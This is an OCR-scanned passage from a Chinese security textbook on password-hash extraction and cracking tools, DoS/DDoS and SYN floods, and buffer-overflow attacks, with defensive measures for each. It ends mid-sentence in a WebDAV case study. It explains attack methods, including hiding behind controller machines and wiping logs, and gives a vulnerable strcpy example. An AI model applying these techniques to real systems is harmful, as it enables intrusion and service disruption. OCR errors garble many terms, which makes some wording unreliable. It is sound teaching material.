(3) PwDump7 不 是 一 个 口令 破解 程序 ,但 是 它 能 用 来 从 SAM 数据 库 中 提取 口令 哈 
希 。LOphtCrack 已 经 内 建 了 这 个 特征 ,但 是 PwDump? 还 是 很 有 用 的 。 首 先 , 它 是 一 个 小 
型 的 , 易 使 用 的 命令 行 工 具 , 能 提取 口令 哈 希 。 其 次 ,目前 很 多 情况 下 LOphtCrack 的 版 本 不 
能 提取 口令 哈 希 。 如 SYSTEM 是 一 个 能 在 NT 下 运行 的 程序 ,为 SAM 数据 库 提供 了 很 强 
的 加 密 功 能 ,如 果 SYSTEM 在 使 用 ,LOphtCrack 就 无 法 提取 哈 希 口令 ,但 是 PwDumpy7 还 
能 使 用 ; 而 且 要 在 Windows 2000 下 提取 哈 希 口令 ,必须 使 用 PwDump7, 因 为 系统 使 用 了 
更 强 的 加 密 模式 来 保护 信息 。 


2. UNIX 口令 破解 程序 


下 面 介绍 UNIX 口令 破解 程序 。 

(1) Crack 是 一 个 旨 在 快速 定位 UNIX 口令 弱点 的 口令 破解 程序 。Crack 使 用 标准 的 
猜测 技术 确定 口令 。 它 检查 口令 是 否 为 如 下 情况 之 一 : 和 user id 相同 .单词 password, Zt 
字符 串 FEP., Crack 通过 加 密 一 长 串 可 能 的 口令 ,并 把 结果 和 用 户 的 加 密 口令 相 比 较 ， 
看 其 是 否 匹 配 。 用 户 的 加 密 口令 必须 是 在 运行 破解 程序 之 前 就 已 经 提供 的 。 

(2) John the Ripper, UNIX 口令 破解 程序 ,但 也 能 在 Windows 平台 运 行 , 功 能 强大 、 运 
行 速度 快 ,可 进行 字典 攻击 和 强行 攻击 。 


3.4.2 拒绝 服务 攻击 与 防御 


拒绝 服务 攻击 行动 使 网 站 服务 器 充斥 大 量 要 求 回复 的 信息 ,消耗 网 络 带宽 或 系统 资源 ， 
导致 网 络 或 系统 不 胜 负荷 直至 瘫痪 而 停止 正常 的 网 络 服务 。 
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1. 拒绝 服务 攻防 概述 


“拒绝 服务 ”的 一 种 攻击 方式 为 : 传送 众多 要 求 确认 的 信息 到 服务 器 ,使 服务 器 中 充斥 
着 这 种 无 用 的 信息 。 所 有 的 信息 都 有 需要 回复 的 虚假 地 址 ,以 至 于 当 服 务 器 试图 回 传 时 , 却 
无 法 找到 用 户 。 服 务 器 于 是 暂时 等 修 , 有 了 时 超过 一 分 钟 ,然后 再 切断 连接 。 服 务 器 切断 连接 
时 ,黑客 再 度 传送 新 一 批 需要 确认 的 信息 ,这 个 过 程 周而复始 ,最 终 导致 服务 器 瘫痪 。 

最 常 遭 受 拒绝 服务 攻击 的 目标 包括 路 由 器 ,数据库 ,Web 服务 器 .FTP 服务 器 以 及 与 协 
议 相 关 的 网 络 服务 (如 DNS, WINS 和 SMB). 


2. 拒绝 服务 攻击 分 类 


拒绝 服务 攻击 有 很 多 种 分 类 方法 ,按照 人 侵 方式 ,拒绝 服务 攻击 可 以 分 为 资源 消耗 型 
DoS 攻击 .配置 修改 型 DoS 攻击 ,物理 破坏 型 DoS 攻击 和 服务 利用 型 DoS 攻击 。 

(1) 资源 消耗 型 DoS 攻击 。 资 源 消耗 型 拒绝 服务 是 指 入 侵 者 试图 消耗 目标 的 合法 资 
源 , 例 如 网 络 带宽 内存、 硬盘 空间 和 CPU 利用 率 ,从 而 得 到 拒绝 服务 的 目的 。 

(2) 配置 修改 型 DoS 攻击 。 计 算 机 配置 不 当 可 能 造成 系统 运行 不 正常 甚至 根本 不 能 运 
行 。 入 侵 者 通过 修改 或 者 破坏 系统 的 配置 信息 来 阻止 其 他 合法 用 户 使 用 计算 机 和 网 络 提供 
的 服务 ,主要 有 几 种 : 改变 路 由 信息 ,修改 Windows 注册 表 ,修改 Linux 的 各 种 配置 文件 。 

(3) 物理 破坏 型 DoS 攻击 。 物 理 破 坏 型 拒绝 服务 主要 针对 物理 设备 的 安全 ,入侵 者 可 
以 通过 破坏 或 改变 网 络 部 件 以 实现 拒绝 服务 。 

CD. 服务 利用 型 DoS 攻击 。 利 用 入 侵 目 标的 自身 资源 实现 入侵 意图 ,由 于 被 入侵 系统 
具有 漏洞 和 通信 协议 的 弱点 ,这 给 入 侵 者 提供 了 机 会 。 入 侵 者 利用 TCP/IP 及 目标 责任 系 
统 自身 应 用 软件 中 的 一 些 漏洞 和 弱点 达到 拒绝 服务 的 目的 。 例 如 投入 使 用 的 Web 服务 器 
有 这 样 一 个 错误 : 当 出 现 特 定 的 错误 时 ,会 显示 一 个 消息 框 ,黑客 可 以 利用 这 一 缺陷 向 用 户 
的 计算 机 发 送 数目 较 少 的 请 求 ,使 该 消息 显示 出 来 。 这 会 锁定 所 有 的 线程 请 求 ,因此 有 效 阻 
止 了 其 他 人 的 访问 请 求 。 在 TCP/IP 堆栈 中 存在 很 多 漏洞 ,如 允许 碎片 包 、 大 数据 包 、IP 路 
由 选择 , 半 公 开 TOP 连接 和 数据 包 Flood 等 都 能 使 系统 崩溃 。 


3. 分 布 式 拒绝 服务 攻击 


分 布 式 拒绝 服务 攻击 (distributed DoS,DDoS) 是 目前 黑客 经 常 采用 而 难以 防范 的 攻击 
手段 。 本 节 着 重 描述 黑客 是 如 何 组 织 并 发 起 的 DDoS 攻击 ,并 结合 其 中 的 Syn Flood 实例 ， 
使 读者 可 以 对 DDoS 攻击 有 一 个 更 形象 的 了 解 。 

1) DDoS 攻击 的 概念 

最 基本 的 DoS 攻击 就 是 利用 合理 的 服务 请 求 来 占用 过 多 的 服务 资源 ,从 而 使 合法 用 户 
无 法 得 到 服务 的 响应 。DDoS 攻击 手段 是 在 传统 的 DoS 攻击 基础 上 产生 的 一 类 攻击 方式 。 
单一 的 DoS 攻击 一 般 是 采用 一 对 一 方式 的 , 当 攻 击 目标 CPU 速度 低 . 内 存 小 或 者 网 络 带宽 
小 等 各 项 性 能 指标 不 高 时 , 它 的 效果 是 明显 的 。 随 着 计算 机 与 网 络 技术 的 发 展 , 计 算 机 的 处 
理 能 力 迅速 增长 ,内 存 大 大 增加 ,同时 也 出 现 了 千 兆 级 别 的 网 络 ,这 使 得 DoS 攻击 的 困难 程 
度 加 大 了 一 一 目标 对 恶意 攻击 包 的 “消化 能 力 ” 加 强 了 不 少 ,例如 你 的 攻击 软件 每 秒 钟 可 以 
发 送 3 000 个 攻击 包 , 但 我 的 主机 与 网 络 带宽 每 秒 钟 可 以 处 理 10 000 个 攻击 包 , 这 样 一 来 攻 
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击 就 不 会 产生 什么 效果 。 

理解 了 DoS 攻击 的 话 , 它 的 原理 就 很 简单 。 如 果 说 计算 机 与 网 络 的 处 理 能 力 加 大 了 
10 倍 ,用 一 台 攻 击 机 来 攻击 不 再 能 起 作用 的 话 , 攻 击 者 使 用 10 台 攻 击 机 同时 攻击 呢 ? 用 
100 台 呢 ? DDoS 就 是 利用 更 多 的 佛 偶 机 (肉鸡 ) 来 发 起 进攻 ,以 比 从 前 更 大 的 规模 来 进攻 受 
害 者 。 

高 速 广泛 连接 的 网 络 给 大 家 带 来 了 方便 ,也 为 DDoS 攻击 创造 了 极为 有 利 的 条 件 。 这 
使 得 攻击 可 以 从 更 远 的 地 方 或 者 其 他 城市 发 起 ,攻击 者 的 便 儒 机 位 置 可 以 分 布 在 更 大 的 范 
围 , 选 择 起 来 更 灵活 。 这 时 候 分 布 式 的 拒绝 服务 攻击 手段 (DDoS) 就 应 运 而 生 了 。 

2) 被 DDoS 攻击 时 的 现象 

被 攻击 主机 上 有 大 量 等 待 的 TCP 连接 ,网 络 中 充斥 着 大 量 的 无 用 的 数据 包 , 源 地 址 为 
假 ,制造 高 流量 无 用 数据 ,造成 网 络 拥塞 ,使 受害 主机 无 法 正常 和 外 界 通信 ,利用 受害 主机 提 
供 的 服务 或 传输 协议 上 的 缺陷 ,反复 高 速 地 发 出 特定 的 服务 请 求 , 使 受害 主机 无 法 及 时 处 理 
所 有 正常 请 求 ,严重 时 会 造成 系统 死机 。 

3) DDoS 攻击 运行 原理 

如 图 3-12 所 示 ,一 个 比较 完善 的 DDoS 攻击 体系 分 成 四 大 部 分 , 先 来 看 一 下 最 重要 的 
第 二 和 第 三 部 分 一 一 控制 便 儒 机 ,攻击 贫 儒 机: 它们 分 别 用 做 控制 和 实际 发 起 攻击 。 请 注 
意 控制 机 与 攻击 机 的 区 别 , 对 第 四 部 分 的 受害 者 来 说 ,DDoS 的 实际 攻击 包 是 从 第 三 部 分 攻 
击 倪 偶 机 上 发 出 的 ,第 二 部 分 的 控制 便 儒 机 只 发 布 命令 而 不 参与 实际 的 攻击 。 对 第 二 和 第 
三 部 分 计算 机 ,黑客 有 控制 权 或 者 是 部 分 的 控制 权 ,并 把 相应 的 DDoS 程序 上 传 到 这 些 平台 
上 ,这 些 程序 与 正常 的 程序 一 样 运行 并 等 待 来 自 黑客 的 指令 ,通常 它 还 会 利用 各 种 手段 隐藏 
自己 不 被 别人 发 现 。 在 平时 ,这 些 佛 儒 机 并 没有 什么 异常 ,只 是 一 旦 黑客 连接 到 它们 进行 控 
制 , 并 发 出 指令 的 时 候 , 攻 击 佛 偶 机 就 成 为 害 人 者 去 发 起 攻击 了 。 


Xt fat 


图 3-12 DDoS 攻击 


为 什么 黑客 不 直接 去 控制 攻击 便 儒 机 ,而 要 从 控制 便 儒 机 上 转 一 下 呢 ? 这 就 是 DDoS 
击 难 以 追查 的 原因 之 一 。 从 攻击 者 的 角度 来 说 ,肯定 不 愿意 被 捉 到 ,而 攻击 者 使 用 的 佛 候 
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机 越 多 ,他 实际 上 提供 给 受害 者 的 分 析 依据 就 越 多 。 在 占领 一 台 机 器 后 ,高 水 平 的 攻击 者 会 
首先 做 两 件 事 : 考虑 如 何 留 好 后 门 , 如 何 清理 日 志 。 这 就 是 擦 掉 脚 印 ,不 让 自己 做 的 事 被 别 
人 察觉 到 。 

但 是 在 第 三 部 分 攻击 斧 候 机 上 清理 日 志 是 一 项 庞大 的 工程 ,即使 有 很 好 的 日 志清 理工 
具 的 帮助 ,黑客 对 这 个 任务 也 很 头痛 。 这 就 导致 了 有 些 攻击 机 和 弄 得 不 干净 ,通过 它 上 面 的 线 
索 找 到 了 控制 它 的 上 一 级 计算 机 ,这 上 级 的 计算 机 如 果 是 黑客 自己 的 机 器 ,那么 他 就 会 被 揪 
出 来 了 。 但 如 果 这 是 控制 用 的 便 介 机 的 话 , 黑 客 自身 还 是 安全 的 。 控 制 全 个 机 的 数目 相对 
很 少 ,一 般 一 台 就 可 以 控制 几 十 台 攻击 机 ,清理 一 台 计 算 机 的 日 志 对 黑客 来 讲 就 轻松 多 了 ， 
这 样 从 控制 机 再 找到 黑客 的 可 能 性 也 大 大 降低 。 


4. DDoS 攻击 的 防范 


到 目前 为 止 ,进行 DDoS 攻击 的 防御 还 是 比较 困难 的 。 首 先 ,这 种 攻击 的 特点 是 它 利用 
了 TCP/IP 的 漏洞 。 一 位 资深 的 安全 专家 给 了 个 形象 的 比喻 : DDoS 就 好 像 有 1 000 个 人 
同时 给 你 家 里 打 电 话 , 这 时 候 你 的 朋友 还 打 得 进来 吗 ? 

网 管 员 作为 一 个 企业 内 部 网 的 管理 者 ,在 他 维护 的 网 络 中 有 一 些 服务 器 需要 向 外 提供 
WWW 服务 ,因而 不 可 避免 地 成 为 DDoS 的 攻击 目标 ,该 如 何 做 呢 ? 可 以 从 主机 与 网 络 设 
备 两 个 角度 去 考虑 。 

(1) 主机 上 的 设置 。 几 乎 所 有 的 主机 平台 都 有 抵御 DoS 的 设置 ,基本 分 为 几 种 情况 : 
关闭 不 必要 的 服务 ; 限制 同时 打开 的 Syn 半 连 接 数 目 ; 缩短 Syn 半 连 接 的 time out 时 间 ; 
及 时 更 新 系统 补丁 。 

(2) 网 络 设备 上 的 设置 。 企 业 网 的 网 络 设备 可 以 从 防火 墙 与 路 由 器 上 考虑 。 这 两 个 设 
备 是 到 外 界 的 接口 设备 ,在 进行 防 DDoS 设置 的 同时 ,要 注意 以 多 大 的 效率 牺牲 为 代价 的 ， 
对 你 来 说 是 否 值得 。 

(3) 防火 墙 : 禁止 对 主机 的 非 开放 服务 的 访问 ; 限制 同时 打开 的 SYN 最 大 连接 数 ; 限 
制 特定 IP 地 址 的 访问 ; 启用 防火 墙 的 防 DDoS 的 属性 ; 严格 限制 对 外 开放 的 服务 器 的 向 外 
访问 。 

(4) 路 由 器 : 以 Cisco 路 由 器 为 例 ,Cisco Express Forwarding; 使 用 unicast reverse- 
path; 访问 控制 列表 (ACL) 过 滤 ; 设置 SYN 数据 包 流量 速率 ; 升级 版 本 过 低 的 ISO; 为 路 
由 器 建立 log server。 

次” 应 用 案例 

SYN-Flood 是 目前 最 流行 的 DDoS 攻击 手段 ,早先 的 DoS 的 手段 在 向 分 布 式 这 一 阶段 
发 展 的 时 候 也 经 历 了 浪 里 淘 沙 的 过 程 。SYN-Flood 的 攻击 效果 最 好 ,这 应 该 是 众 黑 客 不 约 
而 同 选择 它 的 原因 。 


1. TCP 连接 的 三 次 握手 协议 


SYN-Flood 利用 了 TCP/IP 的 固有 漏洞 。 面 向 连接 的 TCP 三 次 握手 是 SYN-Flood ff 
在 的 基础 。TCP 连接 的 三 次 握手 过 程 如 图 3-13 所 示 。 在 第 一 步 中 ,客户 端 向 服务 器 端 提 
出 连接 请 求 。 这 时 TCP SYN 标志 置 位 。 客 户 端 告诉 服务 器 端 序列 号 区 域 合 法 ,需要 检查 。 
客户 端 在 TCP 报头 的 序列 号 区 中 插入 自己 的 ISN。 服 务 器 端 收 到 该 TCP 分 段 后 ,在 第 二 
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步 以 自己 的 ISN 回应 (SYN 标志 置 位 ), 同 时 确认 收 到 客户 端的 第 一 个 TCP 分 段 (ACK 标 
志 置 位 ) 。 在 第 三 步 中 ,客户 端 确认 收 到 服务 器 端的 ISNCACK 标志 置 位 )。 到 此 为 止 建立 
完整 的 TCP 连接 ,开始 全 双 工 模式 的 数据 传输 过 程 。 

[0] 
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图 3-13 TCP 三 次 握手 图 3-14 SYN-Flood 恶意 地 不 完成 

三 次 握手 


2. SYN-Flood 攻击 者 对 三 次 握手 的 利用 


如 图 3-14 所 示 ,假设 一 个 用 户 向 服务 器 发 送 了 SYN 报 文 后 突然 死机 或 掉 线 ,那么 服务 
器 在 发 出 SYN 十 ACK 应 答 报 文 后 是 无 法 收 到 客户 端的 ACK 报 文 的 (第 三 次 握手 无 法 完 
成 ) ,这 种 情况 下 服务 器 端 会 再 次 发 送 SYN 十 ACK 给 客户 端 并 等 待 一 段 时间 后 丢弃 这 个 未 
完成 的 连接 ,这 段 时 间 的 长 度 称 为 SYN Timeout ,一 般 来 说 这 个 时 间 是 分 钟 的 数量 级 (30 秒 
至 2 分 钟 ); 一 个 用 户 出 现 异常 导致 服务 器 的 一 个 线程 等 待 1 分 钟 并 不 是 什么 很 大 的 问题 ， 
但 如 果 有 一 个 恶意 的 攻击 者 大 量 模拟 这 种 情况 ,服务 器 端 将 为 了 维护 一 个 非常 大 的 半 连 接 
列表 而 消耗 非常 多 的 资源 一 一 数 以 万 计 的 半 连 接 ,即使 是 简单 的 保存 并 遍历 也 会 消耗 非常 
多 的 CPU 时 间 和 内 存 ,何况 还 要 不 断 对 这 个 列表 中 的 IP 进行 SYN 十 ACK 的 重 试 。 如 果 
服务 器 的 TCP/IP 栈 不 够 强大 ,最 后 的 结果 是 堆栈 溢出 崩溃 一 一 即使 服务 器 端的 系统 足够 
强大 ,服务 器 端 也 将 忙于 处 理 攻击 者 伪造 的 TCP x Bei ofi JC ELLE P f TE E REOR UG 
时 从 正常 客户 的 角度 看 来 ,服务 器 失去 响应 ,这 种 情况 称 做 服务 器 端 受到 了 SYN-Flood 攻 
击 (SYN 泛 洪 攻击 ) 。 


3.4.8 缓冲 区 溢出 攻击 与 防御 


缓冲 区 溢出 是 一 种 非常 普遍 ,非常 危险 的 漏洞 ,在 各 种 操作 系统 .应 用 软件 中 广泛 存在 。 
利用 缓冲 区 溢出 攻击 ,可 以 导致 程序 运行 失败 ,系统 宕 机 、 重 新 启动 等 后 果 。 更 为 严重 的 是 ， 
可 以 利用 它 执行 非 授权 指令 ,甚至 可 以 取得 系统 特权 ,进而 进行 各 种 非法 操作 。 缓 冲 区 溢出 
攻击 有 多 种 英文 名 称 : buffer overflow, buffer overrun, smash the stack, trash the stack, 


scribble the stack, mangle the stack. memory leak ,overrun screw, 


1. 缓冲 区 溢出 的 原理 


缓冲 区 溢出 的 原理 是 : 通过 往 程 序 的 缓冲 区 写 超出 其 长 度 的 内 容 ,造成 缓冲 区 的 溢出 ， 
从 而 破坏 程序 的 堆栈 ,使 程序 转 而 执行 其 他 指令 ,以 达到 攻击 的 目的 。 造 成 缓冲 区 溢出 的 原 
因 是 程序 中 没有 仔细 检查 用 户 输入 的 参数 。 例 如 下 面 的 程序 : 
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void function(char * str) 
{ 

char buffer[16]; 
strcpy(buffer, str); 

} 


上 面 的 strcpy() 将 直接 把 str 中 的 内 容 copy 到 buffer 中 。 这 样 只 要 str 的 长 度 大 于 
16 ,就 会 造成 buffer 的 溢出 ,使 程序 运行 出 错 。 存 在 像 strcpy() 这 样 问题 的 标准 函数 还 有 
strcat() 、 sprintf() vsprintf() ,getsO scanf() 等 。 

当然 ,随便 往 缓冲 区 中 填 东 西 造成 它 溢出 一 般 只 会 出 现 * 分 段 错误 ”(segmentation 
fault) ,而 不 能 达到 攻击 的 目的 。 最 常见 的 手段 是 通过 制造 缓冲 区 溢出 使 程序 运行 一 个 用 户 
shell, 再 通过 shell 执行 其 他 命令 。 如 果 该 程序 属于 root 且 有 suid 权限 的 话 ,攻击 者 就 获得 
了 一 个 有 root 权限 的 shell, 可 以 对 系统 进行 任意 操作 了 。 

缓冲 区 溢出 成 为 远程 攻击 的 主要 手段 其 原因 在 于 缓冲 区 溢出 漏洞 给 予 了 攻击 者 他 所 想 
要 的 一 切 : 植 人 并 且 执 行 攻击 代码 。 被 植 人 的 攻击 代码 以 一 定 的 权限 运行 有 缓冲 区 溢出 漏 
洞 的 程序 ,从 而 得 到 被 攻击 主机 的 控制 权 。 


2. 缓冲 区 溢出 的 漏洞 和 攻击 


缓冲 区 溢出 攻击 的 目的 在 于 扰乱 具有 某 些 特权 运行 的 程序 的 功能 ,这 样 可 以 使 得 攻击 
者 取得 程序 的 控制 权 , 如 果 该 程序 具有 足够 的 权限 ,那么 整个 主机 就 被 控制 了 。 一 般 而 言 ， 
攻击 者 攻击 root 程序 ,然后 执行 类 似 “exec(sh)” 的 执行 代码 来 获得 root 权限 的 shell。 为 了 
达到 这 个 目的 ,攻击 者 必须 达到 如 下 的 两 个 目标 : 在 程序 的 地 址 空间 中 安排 适当 的 代码 ; 
通过 适当 地 初始 化 寄存 器 和 内 存 , 让 程序 跳 转 到 入 侵 者 安排 的 地 址 空间 执行 。 根 据 这 两 个 
目标 来 对 缓冲 区 溢出 攻击 进行 分 类 。 

1) 安排 适当 的 代码 

(1) 在 程序 的 地 址 空间 中 安排 适当 的 代码 。 在 程序 的 地 址 空间 中 安排 适当 的 代码 的 方 
法 有 两 种 : 植 入 法 ,利用 已 经 存在 的 代码 。 

O 植 和 法。 攻击 者 向 被 攻击 的 程序 输入 一 个 字符 串 ,程序 会 把 这 个 字符 串 放 到 缓冲 
中 。 这 个 字符 串 包含 的 资料 是 可 以 在 这 个 被 攻击 的 硬件 平台 上 运行 的 指令 序列 。 在 这 里 ， 
攻击 者 用 被 攻击 程序 的 缓冲 区 来 存放 攻击 代码 。 缓 冲 区 可 以 设 在 任何 地 方 : 堆栈 (stack, 自 
动 变量 ) HE Cheap ,动态 分 配 的 内 存 区 ) 和 静态 资料 区 。 

Q 利用 已 经 存在 的 代码 。 有 时 ,攻击 者 想 要 的 代码 已 经 在 被 攻击 的 程序 中 了 ,攻击 者 
所 要 做 的 只 是 对 代码 传递 一 些 参数 。 比 如 ,攻击 代码 要 求 执行 “exec(“*/bin/sh”)”, 而 在 libe 
库 中 的 代码 执行 “exec(arg)”, 其 中 arg 是 一 个 指向 一 个 字符 串 的 指针 参数 ,那么 攻击 者 只 
要 把 传人 的 参数 指针 改 向 指向 “/bin/sh” 即 可 。 

(2) 通过 适当 地 初始 化 寄存 器 和 内 存 , 让 程序 跳 转 到 入 侵 者 安排 的 地 址 空间 执行 。 介 
绍 攻击 者 如 何 使 一 个 程序 的 缓冲 区 溢出 ,并 且 执 行 转移 到 攻击 代码 (这 个 就 是 “溢出 ”的 由 
来 ) 的 方法 。 所 有 的 这 些 方法 都 是 在 寻求 改变 程序 的 执行 流程 ,使 之 跳 转 到 攻击 代码 。 最 基 
本 的 就 是 溢出 一 个 没有 边界 检查 或 者 其 他 弱点 的 缓冲 区 ,这 样 就 扰乱 了 程序 的 正常 的 执行 
顺序 。 通 过 溢出 一 个 缓冲 区 ,攻击 者 可 以 用 暴力 的 方法 改写 相 邻 的 程序 空间 而 直接 跳 过 系 
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统 的 检查 。 

2) 利用 已 有 代码 

分 类 的 基准 是 攻击 者 所 寻求 的 缓冲 区 溢出 的 程序 空间 类 型 。 原 则 上 可 以 是 任意 的 空 
间 。 实 际 上 ,许多 的 缓冲 区 溢出 是 用 暴力 的 方法 来 寻求 改变 程序 指针 的 。 这 类 程序 的 不 同 
之 处 就 是 程序 空间 的 突破 和 内 存 空 间 的 定位 不 同 。 主 要 有 三 种 : 活动 记录 (activation 
records) .图 数 指针 (function pointers) .长 跳 转 缓冲 区 (longjmp buffers), 

QD 活动 记录 。 每 当 一 个 函数 调用 发 生 时 ,调用 者 会 在 堆栈 中 留 下 一 个 活动 记录 , 它 包 
会 了 函数 结束 时 返回 的 地 址 。 攻 击 者 通过 溢出 堆栈 中 的 自动 变量 ,使 返回 地 址 指向 攻击 代 
码 。 通 过 改变 程序 的 返回 地 址 , 当 函 数 调用 结束 时 ,程序 就 跳 转 到 攻击 者 设 定 的 地 址 ,而 不 
是 原先 的 地 址 。 这 类 的 缓冲 区 溢出 被 称 为 堆栈 溢出 攻击 (stack smashing attack) ,是 目前 最 
常用 的 缓冲 区 溢出 攻击 方式 。 

@ 函数 指针 。 函 数 指针 可 以 用 来 定位 任何 地 址 空间 。 例 如 :“void x fo) O” T 
一 个 返回 值 为 void 的 函数 指针 变量 foo。 所 以 攻击 者 只 需 在 任何 空间 内 的 函数 指针 附近 找 
到 一 个 能 够 溢出 的 缓冲 区 ,然后 溢出 这 个 缓冲 区 来 改变 函数 指针 。 在 某 一 时 刻 , 当 程序 通过 
函数 指针 调用 函数 时 ,程序 的 流程 就 按 攻 击 者 的 意图 实现 了 。 它 的 一 个 攻击 范例 就 是 在 
Linux 系统 下 的 superprobe 程序 。 

O 长 跳 转 缓冲 区 。 在 C 语言 中 包含 了 一 个 简单 的 检验 /恢复 系统 , 称 为 setjmp/longjmp。 
意思 是 在 检验 点 设 定 “setjmp(buffer)”, 用 “longjmp(buffer) "来 恢复 检验 点 。 然 而 ,如 果 攻 
击 者 能 够 进入 缓冲 区 的 空间 ,那么 "longjmp(buffer) "实际 上 是 跳 转 到 攻击 者 的 代码 。 像 函 
数 指针 一 样 ,longjmp 缓冲 区 能 够 指向 任何 地 方 ,所 以 攻击 者 所 要 做 的 就 是 找到 一 个 可 供 溢 
出 的 缓冲 区 。 一 个 典型 的 例子 就 是 Perl 5.003 的 缓冲 区 溢出 漏洞 ; 攻击 者 首先 进入 用 来 恢 
复 缓冲 区 溢出 的 longjmp 缓冲 区 ,然后 诱导 进入 恢复 模式 ,这 样 就 使 Perl 的 解释 器 跳 转 到 
攻击 代码 上 了 。 

3) 对 代码 安排 和 控制 程序 执行 流程 两 种 技术 的 综合 分 析 

最 常见 的 缓冲 区 溢出 攻击 类 型 就 是 在 一 个 字符 串 中 综合 了 代码 植 和 人 和 活动 记录 技术 。 
攻击 者 定位 一 个 可 供 溢出 的 自动 变量 ,然后 向 程序 传递 一 个 很 大 的 字符 串 ,在 引发 缓冲 区 溢 
出 \ 改 变 活动 记录 的 同时 植 人 了 代码 。 这 个 是 由 Levy 指出 的 攻击 的 模板 。C 在 习惯 上 只 为 
用 户 和 参数 开辟 很 小 的 缓冲 区 ,因此 这 种 漏洞 攻击 的 实例 十 分 常见 。 

代码 植 人 和 缓冲 区 溢出 不 一 定 要 在 一 次 动作 内 完成 。 攻 击 者 可 以 在 一 个 缓冲 区 内 放置 
代码 ,这 是 不 能 溢出 的 缓冲 区 。 然 后 ,攻击 者 通过 溢出 另外 一 个 缓冲 区 来 转移 程序 的 指针 。 
这 种 方法 一 般 用 来 解决 可 供 溢出 的 缓冲 区 不 够 大 (不 能 放下 全 部 的 代码 ) 的 情况 。 

如 果 攻 击 者 试图 使 用 已 经 常 驻 的 代码 而 不 是 从 外 部 植 和 人 代码, 他们 通常 必须 把 代码 作 
为 参数 调用 。 举 例 来 说 ,在 libc( 几 乎 所 有 的 C 程序 都 要 它 来 连接 ) 中 的 部 分 代码 段 会 执行 
“exec(something)”, 其 中 something 就 是 参数 。 攻 击 者 使 用 缓冲 区 溢出 改变 程序 的 参数 ， 
然后 利用 另 一 个 缓冲 区 溢出 ,使 程序 指针 指向 libe 中 的 特定 的 代码 段 。 


3. 缓冲 区 溢出 攻击 的 防范 


缓冲 区 溢出 攻击 占 了 远程 网 络 攻击 的 绝 大 多 数 ,这 种 攻击 可 以 使 得 一 个 匿名 的 
Internet 用 户 有 机 会 获得 一 台 主机 的 部 分 或 全 部 的 控制 权 。 如 果 能 有 效 地 消除 缓冲 区 溢出 
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的 漏洞 , 则 很 大 一 部 分 的 安全 威胁 可 以 得 到 缓解 。 缓 冲 区 溢出 攻击 的 防范 主要 从 操作 系统 
安全 和 程序 设计 两 方面 实施 。 操 作 系 统 安全 是 最 基本 的 防范 措施 ,方法 简单 ,及 时 安装 系统 
补丁 。 程 序 设计 方面 的 措施 主要 是 以 下 几 点 。 

(1) 强制 编写 正确 的 代码 。 编 写 正确 的 代码 是 一 件 非常 有 意义 但 耗 时 的 工作 ,特别 像 
编写 C 语言 那 种 具有 容易 出 错 倾向 的 程序 (如 字符 串 的 零 结 尾 ) ,这 种 风格 是 由 于 追求 性 能 
而 忽视 正确 性 的 传统 引起 的 。 尽 管 人 们 知道 了 如 何 编写 安全 的 程序 ,具有 安全 漏洞 的 程序 
依旧 出 现 。 因 此 人 们 开发 了 一 些 工具 和 技术 来 帮助 程序 员 编 写 安全 正确 的 程序 。 例 如 ,用 
grep 搜索 源 代码 中 容易 产生 漏洞 的 库 的 调用 ,例如 strcpy 的 sprintf 的 调用 ,都 没有 检查 输 
人 参数 的 长 度 。 

虽然 这 些 工具 可 帮助 程序 员 开发 更 安全 的 程序 ,但 是 由 于 C 语言 的 特点 ,这 些 工 具 不 
可 能 找 出 所 有 的 缓冲 区 溢出 漏洞 。 所 以 , 侦 错 技术 只 能 用 来 减少 缓冲 区 溢出 的 可 能 ,并 不 能 
完全 地 消除 它 的 存在 。 除 非 程序 员 能 保证 他 的 程序 万 无 一 失 , 否则 还 是 要 用 到 以 下 部 分 的 
内 容 来 保证 程序 的 可 靠 性 能 。 

(2) 非 执行 的 缓冲 区 。 通 过 使 被 攻击 程序 的 数据 段 地 址 空间 不 可 执行 ,从 而 使 得 攻击 
者 不 能 执行 被 攻击 程序 输入 缓冲 区 的 代码 ,这 种 技术 被 称 为 非 执 行 的 缓冲 区 技术 。 

非 执行 堆栈 的 保护 可 以 有 效 地 对 付 把 代码 植 入 自动 变量 的 缓冲 区 溢出 攻击 ,而 对 于 其 
他 形式 的 攻击 则 没有 效果 。 通 过 引用 一 个 驻 留 程序 的 指针 ,就 可 以 跳 过 这 种 保护 措施 。 其 
他 攻击 也 可 以 把 代码 植 人 堆栈 或 者 静态 数据 中 来 跳 过 保护 。 

(3) 数组 边界 检查 。 植 和 代码 引起 缓冲 区 溢出 是 一 个 方面 ,扰乱 程序 的 执行 流程 是 一 
个 方面 。 不 像 非 执行 的 缓冲 区 保护 ,数组 边界 检查 完全 防止 了 缓冲 区 溢出 的 产生 和 攻击 。 

(4) 程序 指针 完整 性 检查 。 与 边界 检查 略 有 不 同 , 也 与 防止 指针 被 改变 不 同 ,程序 指针 
完整 性 检查 时 在 程序 指针 被 引用 之 前 检测 到 宏观 世界 的 改变 。 因 此 ,即便 一 个 攻击 者 成 功 
地 改变 了 程序 的 指针 ,由 于 系统 事先 检测 到 了 指针 的 改变 ,因此 这 个 指针 将 不 会 被 使 用 。 

与 数组 边界 检查 相 比 ,这 种 方法 不 能 解决 所 有 的 缓冲 区 溢出 问题 ,采用 其 他 的 缓冲 区 溢 
出 方法 就 可 以 避免 这 种 检查 。 但 是 这 种 方法 的 性 能 上 有 很 大 的 优势 ,而 且 兼 容 性 也 很 好 。 

* ”应 用 案例 

Windows 2000 WebDAV 远程 缓冲 区 溢出 漏洞 是 微软 的 又 一 重大 漏洞 ,是 通过 IIS 产 
生 这 个 漏洞 的 ,但 是 漏洞 本 身 并 不 是 TIS 造成 的 ,而 是 由 于 WebDAV 使 用 了 ntdll. dll 中 的 
一 些 API 函数 ,而 这 些 函 数 存在 一 个 缓冲 区 溢出 漏洞 ,也 就 是 说 很 多 调用 这 个 API 的 应 用 
程序 都 存在 这 个 漏洞 。 

Windows IIS 5.0 是 Windows 2000 自 带 的 一 个 网 络 信 息 服务 器 ,其 中 包含 HTTP 服 
务 功能 。IIS 5.0 默认 提供 了 对 WebDAV 的 支持 ,WebDAV( 基 于 Web 的 分 布 式 写作 和 改 
写 ) 是 一 组 对 HTTP 的 扩展 , 它 允 许 用 户 协作 地 编辑 和 管理 远程 Web 服务 器 上 的 文件 。 使 
用 WebDAV, 可 以 通过 HTTP 向 用 户 提供 远程 文件 存储 的 服务 ,包括 创建 .移动 .复制 及 删 
